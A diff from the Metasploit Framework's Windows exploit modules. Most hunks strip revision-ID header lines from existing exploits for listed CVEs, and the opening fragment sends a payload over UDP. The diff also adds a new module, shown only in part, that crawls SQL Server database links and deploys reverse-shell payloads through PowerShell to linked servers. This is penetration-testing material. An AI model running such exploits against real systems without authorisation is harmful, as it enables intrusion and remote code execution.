Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length + message << get_payload + + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + udp_sock.put(message) + + disconnect_udp + end + +end diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 3f9780e7c2..1fcedfa586 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3837' ], diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 235635ee98..c11876ac05 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index 9df55aaf49..1755ed705f 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index a6866bceac..3ed329866b 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 8e96415b39..0370b1cc10 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Joseph Sheridan', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2763' ], diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 6d97fb05b5..c5072f4d98 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0124' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index acaa3e49b4..a2899447d4 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Fairuzan Roslan ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2280' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 406264f02f..42e9a95bc5 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Fairuzan Roslan ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3844' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index eeeca314b6..349b7dd496 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1865' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index b11790327b..332ab4dc1a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote enabled by default. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Oren Isacson', #Initial discovery, poc diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 8e683f0265..043e3b8ffd 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3872' ], diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 23eca7f47c..b4adce5c83 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 7159055855..9933574609 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index dd7151ba97..fc57873c33 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index ee90369c0a..0a5e5e2626 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3853' ], diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index f93bf8da85..2f7be2250f 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4828' ], diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 1f47e3d594..6d8dc17154 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote code can be executed. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1674'], diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index 6c8c6c6513..f3ec16d281 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4411' ], diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 5c33df8ac0..1181d12b26 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'CORELAN Security Team ', 'Ron Henry ', # dijital1; Return address update ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-5109'], diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index c9f8a72391..99981e0239 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4449' ], diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 6495b2cf15..b50d648c70 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3901' ], diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index c24e4fa002..969de21f96 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'patrick', 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1317' ], diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 905db40381..a94600ec60 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61435' ], diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 79ed43083c..8525017434 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1029' ], diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index 1df5c56d1c..8e30a41c3e 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '53559' ], diff --git a/modules/exploits/windows/misc/pxexploit.rb b/modules/exploits/windows/misc/pxexploit.rb index 7c952e178e..63b845050b 100644 --- a/modules/exploits/windows/misc/pxexploit.rb +++ b/modules/exploits/windows/misc/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'PXE Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that @@ -34,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'scriptjunkie' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 3a59b086bc..a22730eb31 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5664'], diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 3e180ad102..af0b4e2bb8 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote code execution. }, 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '56837' ], diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 9bc501672e..cebc5f75a3 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-1595'], diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 7db10b2377..264cdf1f71 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote as the 'Content-Type' parameter. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'xsploitedsec ', #Initial discovery, PoC diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 6779dbded2..9b1ac830c7 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64582'], diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index d875ec8754..ef89972404 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote address and execute arbitrary code. Credit to Maarten Boone. }, 'Author' => 'Jacopo Cervini ', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2711'], diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index 404db5e45e..252c0b373a 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF Module Author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65689'], diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 99b9a4d149..66919f0478 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-4006'], diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 0b35e5b1ef..20ddc25c95 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sickness', #proof of concept 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1591'], diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index 332719052b..4b97aa83c5 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0478' ], diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 9dd588227a..8ac0cf73f4 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1117' ], diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index 7691a44c61..7942402880 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4145'], diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index d9367312e0..ea52d660b0 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0649'], diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 12c92933eb..a82bf46bb1 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1123'], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index e9b25ababe..4e140ecf6f 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -58,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50589' ], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 4ee4950ae1..9b8533acd6 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -58,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Marcos' # SQL Injection mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50589' ], diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb new file mode 100644 index 0000000000..9be19e9d60 --- /dev/null +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -0,0 +1,551 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/exploit/mssql_commands' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::MSSQL + include Msf::Auxiliary::Report + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution', + 'Description' => %q{ + This module can be used to crawl MS SQL Server database links and deploy + Metasploit payloads through links configured with sysadmin privileges using a + valid SQL Server Login. + + If you are attempting to obtain multiple reverse shells using this module we + recommend setting the "DisablePayloadHandler" advanced option to "true", and setting + up a multi/handler to run in the background as a job to support multiple incoming + shells. + + If you are interested in deploying payloads to spefic servers this module also + supports that functionality via the "DEPLOYLIST" option. + + Currently, the module is capable of delivering payloads to both 32bit and 64bit + Windows systems via powershell memory injection methods based on Matthew Graeber's + work. As a result, the target server must have powershell installed. By default, + all of the crawl information is saved to a CSV formatted log file and MSF loot so + that the tool can also be used for auditing without deploying payloads. + }, + 'Author' => + [ + 'Antti Rantasaari ', + 'Scott Sutherland "nullbind" ' + ], + 'Platform' => [ 'win' ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'], + ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], + ['URL','http://www.exploit-monday.com/2011_10_16_archive.html'] + ], + 'Platform' => 'win', + 'DisclosureDate' => 'Jan 1 2000', + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), + OptString.new('PASSWORD', [true, 'The password for the specified username']) + ], self.class) + + register_advanced_options( + [ + OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"]) + ], self.class) + end + + def exploit + # Display start time + time1 = Time.new + print_status("-------------------------------------------------") + print_status("Start time : #{time1.inspect}") + print_status("-------------------------------------------------") + + # Check if credentials are correct + print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") + + if (not mssql_login_datastore) + print_error("Invalid SQL Server credentials") + print_status("-------------------------------------------------") + return + end + + # Define master array to keep track of enumerated database information + masterList = Array.new + masterList[0] = Hash.new # Define new hash + masterList[0]["name"] = "" # Name of the current database server + masterList[0]["db_link"] = "" # Name of the linked database server + 